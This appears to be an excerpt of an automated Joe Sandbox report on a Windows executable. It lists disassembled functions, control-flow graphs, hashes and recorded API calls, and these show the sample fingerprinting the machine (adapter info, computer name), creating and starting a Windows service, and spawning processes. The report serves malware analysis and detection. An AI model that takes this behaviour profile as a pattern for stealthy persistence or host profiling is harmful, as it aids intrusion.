                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 08967c55f8a1793ed7df720ba54a80414af752ee979969d8694cdd05e8816709
                                                                                                                                                                                                            • Instruction ID: e07f7c5fb51390047158890cbeeb334b28c0d4212725318e2cb1d5781558d462
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08967c55f8a1793ed7df720ba54a80414af752ee979969d8694cdd05e8816709
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EA276BAA40305CFC704DFE4FC86AA93BB4F7D5351B01C62AE542962B5EB358897CB41
                                                                                                                                                                                                            Function 009EA930 Relevance: 25.3, APIs: 13, Strings: 1, Instructions: 829memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 716 9ea930-9ea996 717 9ea998-9ea9ad 716->717 718 9ea9b4-9eaae9 call 9d2f90 call 9d13e0 call 9e1bb0 GetProcessHeap 716->718 717->718 725 9eaaeb-9eaafd 718->725 726 9eab54-9eabaf call 9d2f90 LoadLibraryA 718->726 727 9eaaff-9eab11 725->727 728 9eab12-9eab2c 725->728 733 9eabc3-9eabf4 call 9e1bb0 726->733 734 9eabb1-9eabbd 726->734 730 9eab2e-9eab40 728->730 731 9eab41-9eab53 728->731 737 9eabf6-9eac0d 733->737 738 9eac53-9eac6d 733->738 734->733 741 9eac0f-9eac2a 737->741 742 9eac2b-9eac3b 737->742 739 9eac6f-9eac81 738->739 740 9eac83 738->740 745 9eac8d-9eacee call 9d2f90 GetProcAddress call 9e1bb0 739->745 740->745 743 9eac3d-9eac44 742->743 744 9eac4a-9eac52 742->744 743->744 750 9ead28-9ead76 HeapAlloc 745->750 751 9eacf0-9ead27 FreeLibrary 745->751 752 9ead8c-9ead9a 750->752 753 9ead78-9ead8a 750->753 754 9eada0-9eada2 752->754 753->754 755 9eadfa-9eae2a GetAdaptersInfo 754->755 756 9eada4-9eadc8 754->756 759 9eaf4b 755->759 760 9eae30-9eae75 HeapFree 755->760 757 9eadca 756->757 758 9eadd4-9eadf9 FreeLibrary 756->758 757->758 763 9eaf50-9eaf6e 759->763 761 9eae8a-9eaea8 HeapAlloc 760->761 762 9eae77-9eae84 760->762 764 9eaeaa-9eaedd FreeLibrary 761->764 765 9eaf24-9eaf49 761->765 762->761 766 9eaf83-9eaf9e GetAdaptersInfo 763->766 767 9eaf70-9eaf7d 763->767 768 9eaedf-9eaf10 764->768 769 9eaf11-9eaf23 764->769 765->763 770 9eafa4-9eafe6 766->770 771 9eb6a3 766->771 767->766 772 9eafe8 770->772 773 9eaff2-9eb060 call 9d2f90 call 9d13e0 770->773 774 9eb6ad-9eb71d HeapFree FreeLibrary 771->774 772->773 779 9eb06c-9eb0ad call 9e1bb0 773->779 780 9eb062 773->780 783 9eb0b3-9eb0e0 call 9fb260 779->783 780->779 786 9eb0e6-9eb125 call 9fb260 783->786 787 9eb1e5-9eb21d 783->787 792 9eb127-9eb141 786->792 793 9eb143-9eb157 786->793 788 9eb223-9eb225 787->788 788->783 790 9eb22b-9eb22e 788->790 794 9eb659-9eb6a1 call 9fa7e0 790->794 795 9eb15d-9eb15f 792->795 793->795 794->774 798 9eb1d3-9eb1df 795->798 799 9eb161-9eb1b2 795->799 798->787 800 9eb1be-9eb1c5 799->800 801 9eb1b4 799->801 802 9eb1c7-9eb1d1 800->802 803 9eb233-9eb274 call 9d2f90 800->803 801->800 802->788 806 9eb29a-9eb2d1 call 9d13e0 call 9e1bb0 803->806 807 9eb276-9eb294 803->807 812 9eb2df-9eb2fe 806->812 813 9eb2d3-9eb2dd 806->813 807->806 814 9eb30a-9eb31e 812->814 815 9eb300 812->815 813->814 816 9eb395 814->816 817 9eb320-9eb360 814->817 815->814 820 9eb397-9eb39e 816->820 818 9eb378-9eb393 817->818 819 9eb362-9eb376 817->819 818->820 819->820 821 9eb3a4-9eb402 820->821 822 9eb5d1-9eb656 call 9fa7e0 820->822 823 9eb43d-9eb4b0 821->823 824 9eb404-9eb41c 821->824 822->794 826 9eb4be-9eb4ea 823->826 827 9eb4b2-9eb4bc 823->827 824->823 828 9eb41e-9eb437 824->828 830 9eb50a-9eb510 826->830 831 9eb4ec-9eb504 826->831 827->830 828->823 832 9eb517-9eb530 830->832 833 9eb512-9eb516 830->833 831->830 834 9eb579-9eb592 832->834 835 9eb532-9eb541 832->835 833->832 838 9eb598-9eb5c8 834->838 836 9eb543-9eb55f 835->836 837 9eb561-9eb577 835->837 836->838 837->838 838->821 839 9eb5ce 838->839 839->822
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID: #~\
                                                                                                                                                                                                            • API String ID: 54951025-95464956
                                                                                                                                                                                                            • Opcode ID: d121cfc44e5143c08b23175d4c3d5b0d863cfbd20a62ec4ed443656288b80dea
                                                                                                                                                                                                            • Instruction ID: d280bcc8c4a0822153c717f2e8b3fd0c80568ca51f5a02c2ff67201078658da7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d121cfc44e5143c08b23175d4c3d5b0d863cfbd20a62ec4ed443656288b80dea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A72117EA01205CFC304DFE5FC856A63BB4FB99321B11851AE845C72B4E73698A3CB91
                                                                                                                                                                                                            Function 009E0500 Relevance: 13.7, APIs: 9, Instructions: 170serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 840 9e0500-9e0559 OpenSCManagerA 841 9e07be-9e07d2 840->841 842 9e055f-9e05bc CreateServiceA 840->842 843 9e05be-9e05ca 842->843 844 9e05d0-9e05d2 842->844 843->844 845 9e06bc-9e06cc 844->845 846 9e05d8-9e067c ChangeServiceConfig2A StartServiceA 844->846 849 9e06ce-9e06db 845->849 850 9e06e1-9e0714 OpenServiceA 845->850 847 9e067e-9e06a2 846->847 848 9e06a4 846->848 853 9e06a6-9e06b7 CloseServiceHandle 847->853 848->853 849->850 851 9e0716-9e075c StartServiceA CloseServiceHandle 850->851 852 9e0773-9e0778 850->852 851->852 854 9e075e-9e076d 851->854 855 9e077e-9e078d 852->855 853->855 854->852 856 9e078f-9e07a1 855->856 857 9e07a7-9e07b8 CloseServiceHandle 855->857 856->857 857->841
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000002), ref: 009E0537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,012A0610,012A0610,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009E0596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 009E0615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E062A
                                                                                                                                                                                                            • CloseServiceHandle.SECHOST(00000000), ref: 009E06A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,012A0610,00000010), ref: 009E06EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 009E072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009E073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009E07A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: ea63547929bc2555587b95f9949ad8241b2fa675acfa1459c4245c1549414b89
                                                                                                                                                                                                            • Instruction ID: aeb99cb736fc88db5100af5a83bb45803ad5e40b5a8415c946856cfb3bee887b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea63547929bc2555587b95f9949ad8241b2fa675acfa1459c4245c1549414b89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B561CB3AA41310EFD301DFE4FC46BAA3BB4FB96B12F118505E441AA2B4E77558A3CB45
                                                                                                                                                                                                            Function 009E0920 Relevance: 4.8, APIs: 3, Instructions: 254libraryloaderencryptionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 923 9e0920-9e0943 924 9e095e-9e099c 923->924 925 9e0945-9e0958 923->925 926 9e099e-9e09a8 924->926 927 9e09aa-9e09b7 924->927 925->924 928 9e09be-9e0a34 call 9f3110 926->928 927->928 931 9e0a3a-9e0aa5 call 9d2f90 GetProcAddress 928->931 932 9e0bd4-9e0bea 928->932 939 9e0aa7-9e0ab1 931->939 940 9e0ab3-9e0ac0 931->940 934 9e0bec-9e0bf4 932->934 935 9e0bfa-9e0c01 932->935 934->935 937 9e0c58-9e0c7c 935->937 938 9e0c03-9e0c18 CryptGenRandom 935->938 942 9e0c7e-9e0c92 937->942 943 9e0c94 937->943 938->937 941 9e0c1a-9e0c52 938->941 944 9e0ac7-9e0b44 call 9d2f90 call 9e1bb0 GetProcAddress call 9e1bb0 939->944 940->944 941->937 945 9e0c9e-9e0ca6 942->945 943->945 963 9e0b9d-9e0bb7 944->963 964 9e0b46-9e0b4d 944->964 947 9e0cac-9e0cda call 9d2860 * 2 945->947 948 9e0d64-9e0da2 call 9ffcc0 945->948 959 9e0cdc-9e0d02 947->959 960 9e0d08-9e0d58 call 9d2860 * 2 947->960 959->960 960->948 972 9e0d5a 960->972 965 9e0bbd-9e0bd1 963->965 964->963 967 9e0b4f-9e0b5b 964->967 965->932 969 9e0b62-9e0b64 967->969 969->963 971 9e0b66-9e0b9b 969->971 971->965 972->948
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 009E0A8A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 009E0B05
                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(00000000,00000004,?,?), ref: 009E0C10
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$CryptRandom
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 646182245-0
                                                                                                                                                                                                            • Opcode ID: a94674aae1e46f174f4a8b5766d2b2705e53b2d6d22b3a1366dd5aa0df6281bf
                                                                                                                                                                                                            • Instruction ID: f35f98a79a661da264ade6db8b05c44f7a94eaffd252c5ef770b7bc61b081324
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94674aae1e46f174f4a8b5766d2b2705e53b2d6d22b3a1366dd5aa0df6281bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08B110BAA00355CBC710DFE5FC856A537B4FBD6311B11822AE445972B4E3724897CF85
                                                                                                                                                                                                            Function 009F9B00 Relevance: 2.2, APIs: 1, Instructions: 701COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1019 9f9b00-9f9ba3 call 9df230 1022 9f9baf-9f9bdb call a00a20 call 9ef150 1019->1022 1023 9f9ba5 1019->1023 1028 9f9bdd-9f9be9 call 9e2970 1022->1028 1029 9f9beb 1022->1029 1023->1022 1031 9f9bf5-9f9c2b 1028->1031 1029->1031 1033 9f9c2d-9f9c3a 1031->1033 1034 9f9c40-9f9c51 GetComputerNameA 1031->1034 1033->1034 1035 9f9c53-9f9cca call 9d2f90 call 9d13e0 call 9e1bb0 1034->1035 1036 9f9cd0-9f9ce6 1034->1036 1035->1036 1037 9f9d1c-9f9dea call 9d2f90 call 9d13e0 call 9e1bb0 call 9dd530 1036->1037 1038 9f9ce8-9f9d0a 1036->1038 1054 9f9dfe-9f9e3c call 9e2c30 1037->1054 1055 9f9dec-9f9df8 1037->1055 1038->1037 1040 9f9d0c-9f9d17 1038->1040 1040->1037 1058 9f9e3e-9f9e53 1054->1058 1059 9f9e5a-9f9ed6 call 9d13e0 call 9dc580 call 9fa7e0 1054->1059 1055->1054 1058->1059 1066 9f9ed8-9f9efb 1059->1066 1067 9f9f02-9f9f4e call 9ea930 1059->1067 1066->1067 1070 9f9f5a-9fa033 call 9dd500 call a001a0 call a01050 call 9de310 call 9e2c30 1067->1070 1071 9f9f50 1067->1071 1082 9fa035-9fa063 1070->1082 1083 9fa092-9fa1b5 call a001a0 call a01050 call 9de310 call 9e2c30 call a001a0 call a01050 call 9de310 call 9e2c30 call a001a0 call a01050 call 9de310 1070->1083 1071->1070 1084 9fa07e-9fa08b 1082->1084 1085 9fa065-9fa07c 1082->1085 1108 9fa1b7-9fa1c1 1083->1108 1109 9fa1c3-9fa1d0 1083->1109 1084->1083 1085->1083 1110 9fa1d7-9fa254 call 9e2c30 call a001a0 call a01050 call 9de310 call 9e2c30 1108->1110 1109->1110 1121 9fa256-9fa26e 1110->1121 1122 9fa274-9fa37b call 9d2f90 call a001a0 call a01050 call 9de310 call 9e1bb0 call 9e2c30 call a001a0 call a01050 call 9de310 1110->1122 1121->1122 1141 9fa37d 1122->1141 1142 9fa387-9fa3d4 call 9e2c30 call a001a0 call a01050 call 9de310 1122->1142 1141->1142 1151 9fa3f8-9fa581 call 9e2c30 call 9e2f60 call 9e6600 call a001a0 call a01050 call 9de310 call 9e2c30 call 9f99f0 call a001a0 call a01050 call 9de310 call 9dd670 call 9ddef0 call 9e97b0 call 9ed990 1142->1151 1152 9fa3d6-9fa3f2 1142->1152 1183 9fa59c-9fa5c4 call 9dd670 call 9ddef0 call 9e4290 1151->1183 1184 9fa583-9fa58d 1151->1184 1152->1151 1192 9fa5c6-9fa5de 1183->1192 1193 9fa5e5-9fa607 call 9dae40 1183->1193 1184->1183 1186 9fa58f-9fa595 1184->1186 1186->1183 1192->1193 1196 9fa62c-9fa636 call 9f0480 1193->1196 1197 9fa609-9fa620 1193->1197 1200 9fa63b-9fa679 call 9fa7e0 1196->1200 1197->1196 1198 9fa622 1197->1198 1198->1196 1203 9fa67b-9fa690 1200->1203 1204 9fa696-9fa6ec call 9fa7e0 * 2 1200->1204 1203->1204 1209 9fa6ee-9fa708 1204->1209 1210 9fa738-9fa74b call 9de310 call 9fb940 1204->1210 1212 9fa70a-9fa727 call 9de310 call 9fb940 1209->1212 1213 9fa728-9fa733 1209->1213 1213->1210
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000010), ref: 009F9C49
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3545744682-0
                                                                                                                                                                                                            • Opcode ID: 6f296f34a4c9752ddb1679845c494357c0787bfa2cd55c4c5f19e59684ca0f67
                                                                                                                                                                                                            • Instruction ID: 95f65c5bd640e32f7e231da41fa8d857c03dea76c500975c377f25e61f2c2a06
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f296f34a4c9752ddb1679845c494357c0787bfa2cd55c4c5f19e59684ca0f67
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD62CDB9900209CBC704EFE0FD92AFA77B8FB95301F10806AE146961B5EB315A97CF51
                                                                                                                                                                                                            Function 009FFA80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 858 9ffa80-9ffaa8 859 9ffabe-9ffadf 858->859 860 9ffaaa-9ffab7 858->860 861 9ffae1-9ffafe 859->861 862 9ffb00-9ffb19 859->862 860->859 863 9ffb20-9ffbf9 call 9fa7e0 * 2 CreateProcessA 861->863 862->863 868 9ffc8f-9ffcb3 863->868 869 9ffbff-9ffc8e CloseHandle * 2 863->869
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,009EED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 009FFBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(009EED48,?,?,?,?,?,00000000), ref: 009FFC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 009FFC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: f9a12e02d18f54893bf3c8ac3c15b850ea4c597d7b5c7912f61241a60c96f672
                                                                                                                                                                                                            • Instruction ID: 0f8849c3aa8bb04b9609ab00aa1f309939e898099abbfce0f70ecf28e2b8197b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a12e02d18f54893bf3c8ac3c15b850ea4c597d7b5c7912f61241a60c96f672
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC510039A51218DBD704DFE4FC427FA3BF4FB89711F00802AE1469A2A4E7759453CB85
                                                                                                                                                                                                            Function 009DD000 Relevance: 6.3, APIs: 4, Instructions: 269fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 870 9dd000-9dd088 call a05df0 873 9dd08a-9dd0a2 870->873 874 9dd0d0-9dd12f call 9ed990 call 9f3110 CreateFileA 870->874 875 9dd0be-9dd0ca 873->875 876 9dd0a4-9dd0bc 873->876 881 9dd131-9dd13b 874->881 882 9dd140-9dd150 874->882 875->874 876->874 883 9dd404-9dd428 call 9ffcc0 881->883 884 9dd166-9dd169 882->884 885 9dd152-9dd15f 882->885 891 9dd42a-9dd439 883->891 892 9dd440-9dd468 call 9fa7e0 883->892 887 9dd170-9dd19c 884->887 885->884 889 9dd19e-9dd1b3 887->889 890 9dd1b9-9dd24a ReadFile call 9fff30 call 9dd670 call 9e0110 call 9dc530 887->890 889->890 903 9dd250-9dd25a 890->903 904 9dd3e3-9dd3ff CloseHandle 890->904 891->892 905 9dd25c-9dd268 903->905 906 9dd26e-9dd28e call 9e4290 903->906 904->883 905->906 906->887 909 9dd294-9dd2c2 906->909 910 9dd2e8-9dd33a CloseHandle call 9ffcc0 909->910 911 9dd2c4-9dd2e2 909->911 914 9dd33c-9dd348 910->914 915 9dd374-9dd397 call 9fa7e0 910->915 911->910 914->915 916 9dd34a-9dd36e 914->916 919 9dd39d-9dd3b9 915->919 920 9dd469 915->920 916->915 921 9dd3bf-9dd3e2 919->921 922 9dd473-9dd47e 919->922 920->922
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009DD11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 009DD1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009DD3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 009DD2E9
                                                                                                                                                                                                              • Part of subcall function 009FFCC0: ReleaseMutex.KERNEL32(009DD410,?,009DD410,00000128), ref: 009FFCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateMutexReadRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1760212717-0
                                                                                                                                                                                                            • Opcode ID: bf0515dcc65bac66d7783563db39221e8fd36783abb84f12014c4513ecc964e0
                                                                                                                                                                                                            • Instruction ID: 76c4781c4509a40ea030ded0cf6782885c0fa09e9374c9abc26d9e1aaa0542fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf0515dcc65bac66d7783563db39221e8fd36783abb84f12014c4513ecc964e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9B143BAA01604DBD704DFE4FC867A93BB5FBD8312F11C456E145862B0EB7149A7CB41
                                                                                                                                                                                                            Function 009E1D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 973 9e1d90-9e1e21 call a05df0 call 9f3110 978 9e1e4c-9e1e91 CreateFileA 973->978 979 9e1e23-9e1e4b call 9ffcc0 973->979 981 9e1e93-9e1ed0 call 9ffcc0 978->981 982 9e1ed1-9e1ef0 978->982 985 9e1f0c-9e1f18 982->985 986 9e1ef2-9e1f06 982->986 988 9e1f20-9e1f3e 985->988 986->985 989 9e1f59-9e1f85 988->989 990 9e1f40-9e1f57 988->990 991 9e1f8b-9e2063 call 9db620 call 9fff30 WriteFile 989->991 990->991 991->988 996 9e2069-9e209c FindCloseChangeNotification call 9ffcc0 991->996 998 9e20a1-9e20b6 996->998 999 9e20b8 998->999 1000 9e20c2-9e20ca 998->1000 999->1000
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 009F3110: WaitForSingleObject.KERNEL32(?,00004E20,?,009DD0F2,00000128), ref: 009F31AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009E1E7B
                                                                                                                                                                                                              • Part of subcall function 009FFCC0: ReleaseMutex.KERNEL32(009DD410,?,009DD410,00000128), ref: 009FFCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
